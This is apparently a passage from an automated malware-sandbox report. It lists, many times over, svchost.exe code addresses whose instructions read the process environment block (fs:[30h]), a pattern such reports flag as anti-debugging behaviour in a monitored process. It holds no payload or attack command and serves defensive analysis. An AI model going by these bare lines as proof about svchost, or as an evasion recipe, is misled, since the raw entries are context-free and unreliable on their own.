Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]	2_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]	2_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03C6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]	2_2_03C666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]	2_2_03C4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]	2_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]	2_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]	2_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]	2_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]	2_2_03C62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]	2_2_03CAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]	2_2_03C72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]	2_2_03C4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]	2_2_03C66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]	2_2_03C68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]	2_2_03C3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]	2_2_03C365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]	2_2_03C325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]	2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]	2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]	2_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]	2_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]	2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]	2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]	2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]	2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]	2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]	2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]	2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]	2_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]	2_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]	2_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]	2_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]	2_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]	2_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]	2_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]	2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]	2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]	2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]	2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]	2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]	2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]	2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]	2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]	2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]	2_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]	2_2_03C6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]	2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]	2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]	2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]	2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]	2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]	2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]	2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]	2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]	2_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]	2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]	2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]	2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]	2_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]	2_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]	2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]	2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]	2_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]	2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]	2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]	2_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]	2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]	2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]	2_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]	2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]	2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]	2_2_03C429A0
